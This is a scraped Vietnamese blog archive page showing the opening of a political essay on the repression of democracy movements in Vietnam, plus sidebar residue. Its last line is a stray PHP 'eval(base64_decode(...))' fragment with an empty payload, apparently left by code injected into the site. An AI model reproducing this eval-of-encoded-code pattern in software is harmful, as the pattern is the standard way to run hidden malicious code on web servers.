Archive for February 12th, 2018

CHỈ CS MỚI LẬT ĐỔ ĐƯỢC CS?

CHỈ CS MỚI LẬT ĐỔ ĐƯỢC CS?

Thời gian vừa qua, các phong trào xã hội, phong trào dân chủ tại Việt Nam chịu đựng sự đàn áp khốc liệt của giới cầm quyền CS. Không gian bị thu hẹp. Phần lớn các lãnh đạo phong trào đều bị bắt. Một số bị xét xử với những bả

02.12.2018 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>